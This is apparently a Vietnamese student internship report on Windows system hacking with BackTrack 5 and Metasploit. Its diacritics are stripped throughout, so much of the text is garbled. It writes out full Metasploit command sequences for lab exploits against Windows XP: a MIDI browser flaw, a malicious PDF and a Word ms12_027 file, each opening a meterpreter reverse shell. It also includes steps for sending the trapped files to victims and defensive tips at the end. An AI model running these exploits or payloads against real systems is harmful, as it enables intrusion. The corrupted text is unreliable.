Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý

1. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 1 M U Theo thng k ca cng ty Bkav, t u nm 2013 n nay, ti Vit Nam c 2.405 website ca cc c quan, doanh nghip b xm nhp, trung bnh mi thng c khong 300 website b tn cng. ng V Ngc Sn, Ph ch tch ph trch Nghin cu pht trin caBkav cho bit, cc c quan doanh nghip b tn cng gn nh l y , t t nghim trng n nghim trng v rt nghim trng (nhm nh cp cc ti liu mt) v cc m c ny nhm c vo B Cng An, B Quc phng, ngn hng, cc c quan n v nghin cu, cc doanh nghip Theo nhn nhn ca Bkav, c nhng chin dch tn cng, pht tn m c c ch ch vo Vit Nam. Trong , bn thn cc v tn cng trn mng v cc v xm nhp h thng cng ngh thng tin l nhm do thm, trc li, ph hoi d liu, n cp ti sn, cnh tranh khng lnh mnh v mt s v mt an ton thng tin s khc ang gia tng mc bo ng v s lng, a dng v hnh thc, tinh vi hn v cng ngh. Trc tnh hnh , song songvic ban hnh chth897/CT-TTg,Th Tng cho cc B, ngnh, a phng tng cng gii php m bo an ton thng tin s. Th tng Chnh ph cng nu r, trong thi gian qua, tnh hnh mt an ton thng tin s nc ta din bin phc tp, xut hin nhiu nguy c e da nghim trng n vic ng dng cng ngh thng tin phc v pht trin kinh t - x hi v m bo quc phng, an ninh. Bi bo co ny s gii thiu tng qut v cc phng php m Hacker s dngtncngxmnhpvkhaithcvoccphinbnhiuhnh Windows, h iu hnh ph bin nht hin nay ti Vit Nam, t gip chng ta nm r cch thc m Hacker s dng v a ra cc gii php gip cho mi ngi dng c an ton thng tin, bo mt trong thi i Internet ngy nay. Hong Thanh Qu.

2. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 2 LI CM N thc hin v hon thnh ti ny,trc ht ti xin cm n n cc thy V Thng, ging vin hng dn sinh vin thc tp ti Trung tm o to qun tr mngv an ninh mngquc t ATHENA, tn tnh ch bo trong thi gian va qua. Ticngxin gi licm n ncc anh ch, bn b truyn t kinh nghim v to iu kin cho ti hon thnh ti ny. Trong qu trnh thc hin tikhng thkhng c nhngsai st, mong thyc ti trung tm ATHENA v cc bn thng thn gp ti rtkinh nghim trong cc cng trnh tm hiu, pht trin sau ny. Hong Thanh Qu.

3. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 3 PHN 1: GII THIU 1.1 System Hacking v Tnh hnh an ninh mng Vit Nam System hacking bao gm nhng k thut ly username, password da vo phn mm ci trn h thng hoc tnh d ci t v chy cc dch v t xa ca h iu hnh Windows. Nng quyn trong h thng, s dng keyloger ly thng tin, xa nhng log file h thng. Mt khi xm nhp vo h thng, Hacker c th thc hin mi th trn my tnh , gy ra nhng hu qu v cng nghim trng cho cc c nhn, t chc. 1.2 Cc l hng thng khai thc trong h iu hnh Windows Phn mm my tnh ngy nay v cng phc tp, bao gm hng ngn dng m. Phn mm c vit ra bi con ngi, nn cng chng c g l khi trong c cha nhng li lp trnh, c bit n vi tn gi l hng. Nhng l hng ny c Hacker s dng xm nhp vo h thng, cng nh c tc gi ca cc an m c dng khi ng chng trnh ca h mt cch t ng trn my tnh ca bn. Hin nay cc l hng bo mt c pht hin cng nhiu trong cc h iu hnh, cc Web Server hay cc phn mm khc, ... V cc hng sn xut lun cp nht cc l hng v a ra cc phin bn mi sau khi v li cc l hng ca cc phin bn trc. Do , ngi s dng phi lun cp nht thng tin v nng cp phin bn c m mnh ang s dng nu khng cc Hacker s li dng iu ny tn cng vo h thng. Thng thng, cc forum ca cc hng ni ting lun cp nht cc l hng bo mt v vic khai thc cc l hng nh th no th ty tng ngi. Microsoft lun c nhng ci tin an ninh vt tri qua mi phin bn mi ca h iu hnh Windows. Tuy nhin, mt s tht l cc mi e da mng vn ang ngy cng pht trin nhanh hn so vi chu trnh cp nht v i mi h iu hnh ca Microsoft. Ti phm mng thng s dng cc l hng trong cc m chng trnh truy cp vo cc d liu v ti nguyn trn my tnh b li bo mt. Cc chng trnh c hi

4. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 4 c thit k c bit khai thc cc l hng ny, c gi l k thut exploit, ang ngy cng ph bin nhanh chng. Nhng sn phm ca Microsoft thng gp phi cc l hng bo mt nh HH Windows,InternetExplorer,WindowsServer,MicrosoftExchangev.NetFramework. 1.3 Qu trnh tn cng vo mt h thng Trc tin ta s tm hiu tng qut mt qu trnh tn cng h thng. Mc tiu pha trc ca chng ta l mt h thng my tnh. Cc bc tn cng, nh sp n, c th c lit k nh hnh v bn cnh. N gm 6 cng on nh sau: Enumerate (lit k): Trch ra tt c nhng thng tin c th v user trong h thng. S dng phng php thm d SNMP c c nhng thng tin hu ch, chnh xc hn.

5. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 5 Crack: Cng on ny c l hp dn nhiuHackernht. Bc ny yu cu chng ta b kha mt khu ng nhpcauser.Hocbngmtcchnokhc,mctiu phi t ti l quyn truy cp vo h thng. Escalste (leo thang): Ni cho d hiu l chuyn i gii hn truy cp t user binh thng ln admin hoc user c quyn cao hn cho chng ta tn cng. Execute (thc thi): Thc thi ng dng trn h thng my ch. Chun b trc malware, keylogger, rootkit chy n trn my tnh tn cng. Hide (n file): Nhng file thc thi, file soucecode chy chng trnh Cn phi c lm n i, trnh b mc tiu pht hin tiu dit. Tracks (du vt): Tt nhin khng phi l li du vt. Nhng thng tin c lin quan n bn cn phi b xa sch, khng li bt c th g. Nu khng kh nng bn b pht hin l k t nhp l rt cao. Tm li, qu trnh tn cng h thng (System hacking) l bc tip theo sau qu trnh kho st, thu thp thng tin ca mc tiu cn tn cng bng nhng k thut nh Footprinting,Socialengineering,Enumeration,GoogleHackingcpdng cho mc ch truy tm thng tin. Khi h thng mc tiu c xc nh, chng ta bt u i vo qu trnh tn cnghthngthts.Taphitinhnhnhngkthutkhcnhaulmsaovo c trong h thng , thc hin nhng vic m mnh mong mun, nh xa d liu, chy chng trnh trojan, keylogger

6. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 6 PHN 2: S DNG BACKTRACK KHAI THC XM NHP TRONG MNG LAN 2.1 H iu hnh Backtrack 5 R3 Backtrack l mt bn phn phi dng Live DVD ca Linux, c pht trin th nghim xm nhp. Backtrack l s hp nht gia 3 bn phn phi khc nhau ca Linux v thm nhp th nghim IWHAX, WHOPPIX, v Auditor. Trong phinbnhinti can(5),BacktrackcdatrnphinbnphnphiLinux Ubuntu 11.10. Cng c Backtrack c lch s pht trin kh lu qua nhiu bn linux khc nhau. Phin bn hin nay s dng bn phn phi Slackware linux (Tomas M.(www.slax.org)). Backtrack lin tc cp nht cc cng c, drivers,...Hin ti Backtrack c trn 300 cng c phc v cho vic nghin cu bo mt. Backtrack l s kt hp gia 2 b cng c kim th bo mt rt ni ting l Whax v Auditor. Backtrack 5 cha mt s cng c c th c s dng trong qu trnh th nghim thm nhp ca chng ta. Cc cng c kim tra thm nhp trong Backtrack 5 c th c phn loi nh sau: Information gathering: loi ny c cha mt s cng c c th c s dng c c thng tin lin quan n mt mc tiu DNS, nh tuyn, a ch e-mail, trang web, my ch mail, v nh vy. Thng tin ny c th u thp t cc thng tin c sn trn Internet, m khng cn chm vo mi trng mc tiu. Network mapping: loi ny cha cc cng c c th c s dng kim tra cc host ang tn ti, thng tin v OS, ng dng c s dng bi mc tiu, v cng lm portscanning. Vulnerabilityidentification:Trongthloiny,chngtacthtmthycc cng c qut cc l hng (tng hp) v trong cc thit b Cisco. N cng cha cc cng c thc hin v phn tch Server Message Block (SMB) vSimple Network Management Protocol (SNMP).

7. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 7 Web application analysis: loi ny cha cc cng c c th c s dng trong theo di, gim st cc ng dng web. Radio network analysis: kim tra mng khng dy, bluetooth v nhn dng tn s v tuyn (RFID), chng ta c th s dng cc cng c trong th loi ny. Penetration: loi ny cha cc cng c c th c s dng khai thc cc l hng tm thy trong cc my tnh mc tiu. Privilegeescalation:Saukhikhaithccclhngvctruycpvocc my tnh mc tiu, chng ta c th s dng cc cng c trong loi ny nng cao c quyn ca chng ta cho cc c quyn cao nht. Maintaining access: Cng c trong loi ny s c th gip chng ta trong vic duy tr quyn truy cp vo cc my tnh mc tiu. Chng ta c th cn c c nhngc quyncaonhttrckhiccchngtacthcitcngcduytr quyn truy cp. Voice Over IP (VOIP): phn tch VOIP chng ta c th s dng cc cng c trong th loi ny. Digital forensics: Trong loi ny, chng ta c th tm thy mt s cng c c th c s dng lm phn tch k thut nh c c hnh nh a cng, cu trc cc tp tin, v phn tch hnh nh a cng. s dng cc cng c cung cp trong th loi ny, chng ta c th chn Start Backtrack Forensics trong trnh n khi ng. i khi s i hi chng ta phi gn kt ni b a cng v cc tp tin trao i trong ch ch c bo tn tnh ton vn. Reverse engineering: Th loi ny cha cc cng c c th c s dng g ri chng trnh mt hoc tho ri mt tp tin thc thi. Chng ta c th ti bn Backtrack 5 ti a ch: www.backtracklinux.org/downloads/

8. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 8 2.2 Phn mm Metasploit Metasploit l mt d n bo mt my tnh cung cp cc thng tin v vn l hng bo mt cng nh gip v kim tra thm nhp v pht trin h thng pht hin tncngmng.MetasploitFrameworklmtmitrngdngkimtra,tn cngv khai thc li ca cc service. Metasploit c xy dng t ngn ng hng itngPerl,vinhngcomponentscvitbngC,assembler,vPython. Metasploit c th chy trn hu ht cc h iu hnh: Linux, Windows, MacOS. Chng ta cth download chng trnh ti www.metasploit.com. Metasploit h tr nhiu giao din vi ngi dng: Consoleinterface:dnglnhmsfconsole.Msfconsoleinterfacesdngcc dng lnh cu hnh, kim tra nn nhanh hn v mm do hn. Webinterface:dngmsfweb,giaotipvingidngthngquagiaodin Web. Command line interface: dng msfcli. Metasploit Enviroment: Global Enviroment: c thc thi thng qua 2 cu lnh setg v unsetg, nhng options c gn y s mang tnh ton cc, c a vo tt c cc module exploits. TemporaryEnviroment:cthcthithngqua2culnhsetvunset, enviroment ny ch c a vo module exploit ang load hin ti, khng nh hng nccmoduleexploitkhcChngcthlulienviromentmnhcu hnh thng qua lnh save. Mi trng s c lu trong ./msf/config v s c load tr li khi user interface c thc hin. S dng Metasploit Framework: a)Chn module exploit: La chn chng trnh, dch v li m Metasploit c h tr khai thc Show exploits: xem cc module exploit m framework c h tr. Use exploit_name: chn module exploit.

9. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 9 Info exploit_name: xem thng tin v module exploit. Chng ta nn cp nht thng xuyn cc li dch v cng nh cc modul trn www.metasploit.comhocqualnhmsfupdatehoc svnupdat/opt/metasploit/msf3/. b)Cu hnh Module exploit chn: show options: Xc nh nhng options no cn cu hnh. set : cu hnh cho nhng option ca module . Mt vi module cn c nhng advanced options, chng ta c th xem bng cch g dng lnh show advanceds. c)Verify nhng options va cu hnh: check: kim tra xem nhng option c set chnh xc cha. d)La chn target: show targets: nhng target c cung cp bi module . set: xc nh target no. e)La chn payload: show payloads: lit k ra nhng payload ca module exploit hin ti. info payload_name: xem thng tin chi tit v payload . setpayloadpayload_name:xcnhpayloadmodulename.Saukhilachn payload no, dng lnh show options xem nhng options ca payload . show advanced: xem nhng advanced options ca payload . g)Thc thi exploit: exploit:lnhdngthcthipayloadcode.Payloadsauscungcpcho chng ta nhng thng tin v h thng c khai thc.

10. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 10 2.3 S tng quan h thng mng LAN Trong mt mng LAN ni b, cc my tnh thng kt ni vi nhau vi khong cch vt l gn nh trong mt phng, mt tng, mt ta nh, cng ty, Cc my tnh trongmngLANcthchiastinguynvinhau,minhnhlchiastp tin, my in, my qut v mt s thit b khc. Khi mt my tnh trong mng LAN, n c th s dng cc chng trnh, phn mm qut h thng mng bit c a ch IP cc host c trong mng. Nmap(NetworkMapper)lmttinchngunmminphchophthin mng v kim ton an ninh. Nmap v Zenmap (Cng c h tr ha ca nmap) c ci t sn trong BackTrack, s dng cc gi tin IP gip xc nh host no c sn trn mng, ccdchv(tnngdngvphinbn)mhostangcungcp,hiu hnhg(vccphinbnhiuhnh)mhangchy,loiblcgitinhoc tng la no ang s dng, v nhiu c im khc. Nmap chy c trn tt c cc h iu hnh, v cc gi nh phn chnh thc c sn cho Linux, Windows, v Mac OS X. Sau khi xc nh c cc host c trong mng, ta c th s dng cc cng c qut li h thng xc nh l hng ca h thng mun xm nhp, t khai thc truy cp

11. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 11 vo h thng. Mt trong s cc cng c qut li ny l Nessus, download ti a ch http://www.nessus.org/. Mtkhixmnhpthnhcngvchimctonquyniukhinh thng,Hackercththchinmivictrnmynnnhnnhdown/uploadfiles, thayicutrchthng,thcthichngtrnh,nhcpmtkhu,citrojan/ backdoor, 2.4 Xm nhp v khai thc Windows XP 2.4.1 L hng s dng: Ms12_004 Khi ng msfconsole t ca s terminal ca BackTrack. Khai bo l hng s dng v thit t options: Search ms12_004 use exploit/windows/browser/ms12_004_midi show options set SRVHOST 192.168.159.128 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.159.128 exploit

12. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 12 BackTrack s to ra mt link cha m c (http ://192.168.159.128:4444). Ch cn nn nhn nhp chut vo link trn th BackTrack s t dng gi m c sang my nn nhn v sau c th xem thng tin, chin quyn ca my nn nhn . Tin hnh khai thc my nn nhn c IP: 192.168.159.130 port 1078.

13. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 13 sessions sessions i 1 getuid sysinfo Hacked: khai thc thnh cng li ms12_004 trn winXP SP2. Nn nhn : Computer: QUYDONGN 3B5D9F. Os: Windows XP (Build 2600. Service Pack 2). Architecture: x86. Systemlanguage: en US. Meterpreter: x86/win32.

14. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 14 2.4.2 L hng s dng thng qua file PDF Khi ng msfconsole t ca s terminal ca BackTrack. Khai bo l hng s dng v thit t options: Search nojs use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs show options set FILENAME hack.pdf set payload windows/meterpreter/reverse_tcp set LHOST 192.168.136.128 set LPORT 4444 exlpoit Backtrack thng bo to thnh cng 1 file hack.pdf nm trong th mc /root/ms4/local/. use multi/hanler set payload windows/meterpreter/reverse_tcp

15. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 15 set LHOST 192.168.136.128 exploit Backtrack thng bo sn sng cho vic tn cng. Chng ta s gi file hack.pdf va to ra trc cho nn nhn. Nu nn nhn m file hack.pdf th Backtrack s gi cc m c sang my nn nhn ly thng tin v chim quyn iu khin my nn nhn.

16. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 16 Backtrack thng bo c 1 sessions m file hack.pdf l my c a ch IP 192.168.136.128 port 1037 v gi 752128 file m c sang my nn nhn. Tip theo chng ta s kim tra thng tin my nn nhn. sysinfo

17. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 17 Hacked: khai thc thnh cng thng qua li file PDF trn winXP SP2 Nn nhn: Computer: HUUANHH 9091FB1. Os: Windows XP (Build 2600. Service Pack 2). Architecture: x86. Systemlanguage: en US. Meterpreter: x86/win32. 2.4.3 L hng s dng thng qua file Word 2007 Khi ng msfconsole t ca s terminal ca BackTrack. Khai bo l hng s dng v thit t options: Search ms12_027 use exploit/windows/fileformat/ms12_027_mscomctl_bof show options set FILENAME hack.doc set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.104 exlpoit

18. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 18 Backtrack thng bo to thnh cng 1 file hack.pdf nm trong th mc /root/ms4/local/. use exploit/multi/hanler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.104 exploit

19. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 19 Backtrack thng bo sn sng cho vic tn cng. Chng ta s gi file hack.doc va to ra trc cho nn nhn. Nu nn nhn m file hack.doc th Backtrack s gi cc m c sang my nn nhn ly thng tin v chim quyn iu khin my nn nhn.

20. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 20 Backtrack thng bo c 1 sessions m file hack.doc l my c a ch IP 192.168.1.104 port 4444 v gi 752128 file m c sang my nn nhn. Tip theo chng ta s kim tra thng tin my nn nhn. sysinfo Hacked: khai thc thnh cng thng qua li file Word 2007 trn winXP SP2. Nn nhn: Computer: QUYDONGN 3B5D9F. Os: Windows XP (Build 2600. Service Pack 2). Architecture: x86. Systemlanguage: en US. Meterpreter: x86/win32.

21. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 21 PHN 3: TNG KT Vi nhng kiu tn cng h thng da trn nhng li sai st trong qu trnh s dng my tnh hoc cc li v bo mt vt l, c mt s phng php nhm gim thiu v phng trnh vic Hacker nh cp mt khu nh sau: Mt khu phi c t nhiu hn 8 k t v phi l tng hp gia ch hoa, ch thng, s v k t c bit cc chng trnh kh d ra. Cu hnh trong registry cho mt khu trong h thng windows ch c bm v lu di dng NTLM cc chng trnh kh khn d tm. Bt ln 1 kho: HKEY_LOCAL_MACHINES/SYSTEM/CurrentControlSetControlLsaNoLMHash. Ngi dng Admin nn xo tp tin sam trong th mc Windows/repair sau mi ln backup d liu bng rdisk. Trong qu trnh s dng my tnh truy cp Internet. Ngi dng cn lu : Khng m tp tin nh km th in t c ngun gc khng r rng hoc khng tin cy. Chc chn rng bn c v bt h thng tng la cho h thng ca mnh. m bo Windows ca bn c cp nht thng xuyn, phn mm bo mt ca bn c chc nng cp nht live (t ng cp nht trc tuyn). Microsoft xy dng mt lot cc cng c trong Windows cc nh qun tr cng nh ngi dng c kinh nghim c th phn tch chic my tnh ca mnh xem liu n c ang b xm phm hay khng. Mt khi nghi ng my tnh ca mnh b xm nhp, ngi dng c th s dng cc cng c ny t kim tra my tnh ca mnh khi c nhng biu hin ng ng: WMIC, lnh net, Openfiles, Netstat, Find.

22. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 22 PHN 4: TI LIU THAM KHO [1] Nguyn Sn Kh, Tn Pht, Nguyn Cao Thng, Athena S dng BackTrack 5R3 khai thc l hng mng. [2] System Hacking http://timtailieu.vn/tai-lieu/bai-giang-system-hacking-27060/. [3] Th vin trng i hc Cng Ngh Thng Tin Tn cng h thng http://www.citd.edu.vn/Vietnam/Home/index.php/tuyensinh/k-thut-tncong/29-tn-cong-h- thng-system-hacking?lang=.

Education

Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý